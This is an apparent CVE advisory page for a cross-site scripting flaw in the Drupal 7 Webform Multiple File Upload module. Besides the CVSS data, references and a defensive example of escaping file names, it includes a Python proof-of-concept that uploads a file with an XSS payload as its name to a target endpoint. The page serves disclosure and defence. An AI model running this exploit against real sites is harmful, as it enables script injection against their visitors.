Security Vulnerability Report
CVE-2025-12848 CVSS 6.1 MEDIUM

CVE-2025-12848

Published: 2025-11-26 02:15:49
Last Modified: 2026-03-26 21:17:00

Description

Webform Multiple File Upload module for Drupal 7.x contains a cross-site scripting (XSS) vulnerability in the file name renderer. An unauthenticated attacker can exploit this vulnerability by uploading a file with a malicious filename containing JavaScript code (e.g., "<img src=1 onerror=alert(document.domain)>") to a Webform node with a Multifile field where file type validation is disabled. This allows the execution of arbitrary scripts in the context of the victim's browser. The issue is present in a third-party library and has been addressed in a patch available at https://github.com/fyneworks/multifile/pull/44. Users are advised to apply the provided patch or update to a fixed version of the module.
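The defect class described above is a file name inserted into markup without escaping. The JavaScript below is an added example, not code from this report or from the multifile library, and it does not reproduce the library's actual patch (the linked pull request is the authoritative fix). It contrasts an unsafe renderer that concatenates the name into HTML with a hardened one that HTML-escapes it first, using the payload string quoted in the description as constructed input. The function names, the wrapper markup and the escape table are assumptions for illustration.

```javascript
// Added example (not from the CVE record or the multifile library):
// unsafe vs. escaped rendering of an untrusted upload file name.
// All names below are assumed for illustration.

// The five characters that must never reach HTML markup unescaped.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Escape a string for use as HTML text content or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Unsafe renderer: the flaw class in the advisory. The file name is
// concatenated into markup, so a name that contains a tag becomes part
// of the DOM when this string is assigned to innerHTML.
function renderFileNameUnsafe(fileName) {
  return '<span class="multifile-name">' + fileName + '</span>';
}

// Hardened renderer: every markup-significant character in the untrusted
// name is escaped, so the browser displays it as text and never parses it.
function renderFileNameSafe(fileName) {
  return '<span class="multifile-name">' + escapeHtml(fileName) + '</span>';
}

// Review/test helper: true when the rendered HTML still carries a raw tag
// from the untrusted input (the known wrapper is stripped before checking).
function containsRawTag(html) {
  const inner = html
    .replace(/^<span class="multifile-name">/, '')
    .replace(/<\/span>$/, '');
  return /<[a-zA-Z]/.test(inner);
}

// Constructed input: the file name quoted in the advisory's description,
// not a captured upload.
const SAMPLE_NAME = '<img src=1 onerror=alert(document.domain)>';

console.log('unsafe:', renderFileNameUnsafe(SAMPLE_NAME));
console.log('safe:  ', renderFileNameSafe(SAMPLE_NAME));
```

The same escaping applies wherever an upload widget echoes the name back to the page (progress lists, error messages, the confirmation view); in a DOM-based renderer, assigning the raw name to `textContent` instead of building an HTML string achieves the same result without a manual escape table.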

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.2:*:*:*:*:drupal:*:* - VULNERABLE
cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.3:*:*:*:*:drupal:*:* - VULNERABLE
cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.4:*:*:*:*:drupal:*:* - VULNERABLE
cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.5:*:*:*:*:drupal:*:* - VULNERABLE
cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.6:*:*:*:*:drupal:*:* - VULNERABLE
Webform Multiple File Upload module for Drupal 7.x (all unfixed versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12848 PoC - XSS via malicious filename in Drupal Webform Multifile
# Target: Drupal 7.x with Webform Multiple File Upload module
# Vulnerability: XSS in file name renderer

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.local'
webform_path = '/webform/multifile-endpoint'

# Malicious filename to trigger XSS
malicious_filename = '<img src=1 onerror=alert(document.domain)>'

# Prepare the malicious file
files = {
    'files[files][]': (
        malicious_filename,
        'dummy content',
        'application/octet-stream'
    )
}

# Send the malicious file upload request
try:
    response = requests.post(
        f'{target_url}{webform_path}',
        files=files,
        timeout=10
    )
    print(f'Status Code: {response.status_code}')
    print(f'Response: {response.text[:500]}')
    print('\nPoC sent successfully. If the target is vulnerable,')
    print('the XSS payload will execute when the filename is rendered.')
except requests.exceptions.RequestException as e:
    print(f'Request failed: {e}')

References

https://d7es.tag1.com/security-advisories/webform-multiple-file-upload-critical-cross-site-scripting
https://www.d7security.org/security-advisories/D7SECURITY-SA-CONTRIB-2025-001/
https://www.drupal.org/node/3105204 (Patch, Vendor Advisory)
https://www.herodevs.com/vulnerability-directory/cve-2025-12848

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12848", "sourceIdentifier": "[email protected]", "published": "2025-11-26T02:15:48.817", "lastModified": "2026-03-26T21:17:00.010", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Webform Multiple File Upload module for Drupal 7.x contains a cross-site scripting (XSS) vulnerability in the file name renderer. An unauthenticated attacker can exploit this vulnerability by uploading a file with a malicious\nfilename containing JavaScript code (e.g., \"<img src=1 onerror=alert(document.domain)>\") to a Webform node with a Multifile field where file type validation is disabled. This allows the execution of arbitrary scripts\nin the context of the victim's browser.\n \nThe issue is present in a third-party library and has been addressed in a patch available at  https://github.com/fyneworks/multifile/pull/44 . Users are advised to apply the provided patch or update to a fixed version of the module."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:X/R:U/V:D/RE:L/U:Amber", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "NOT_DEFINED", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "LOW", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.2:*:*:*:*:drupal:*:*", "matchCriteriaId": "36B05E21-D024-4BDD-8278-D41CB19AC1E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.3:*:*:*:*:drupal:*:*", "matchCriteriaId": "E5483807-EF6D-49EB-BA44-B87F687B13C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.4:*:*:*:*:drupal:*:*", "matchCriteriaId": "AF414458-4EF4-4C86-84E2-22D3AAED513E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.5:*:*:*:*:drupal:*:*", "matchCriteriaId": "379AA449-C4C9-475F-8614-A7654BE530EA"}, {"vulnerable": 
true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.6:*:*:*:*:drupal:*:*", "matchCriteriaId": "B4B38B66-E62F-42EF-8979-4BDE49B5EEDC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:webform_multiple_file_upload_project:webform_multiple_file_upload:7.x-1.x:dev:*:*:*:drupal:*:*", "matchCriteriaId": "BC4FEB91-00A6-40BD-A9AC-368E6AADBA45"}]}]}], "references": [{"url": "https://d7es.tag1.com/security-advisories/webform-multiple-file-upload-critical-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.d7security.org/security-advisories/D7SECURITY-SA-CONTRIB-2025-001/", "source": "[email protected]"}, {"url": "https://www.drupal.org/node/3105204", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://www.herodevs.com/vulnerability-directory/cve-2025-12848", "source": "[email protected]"}]}}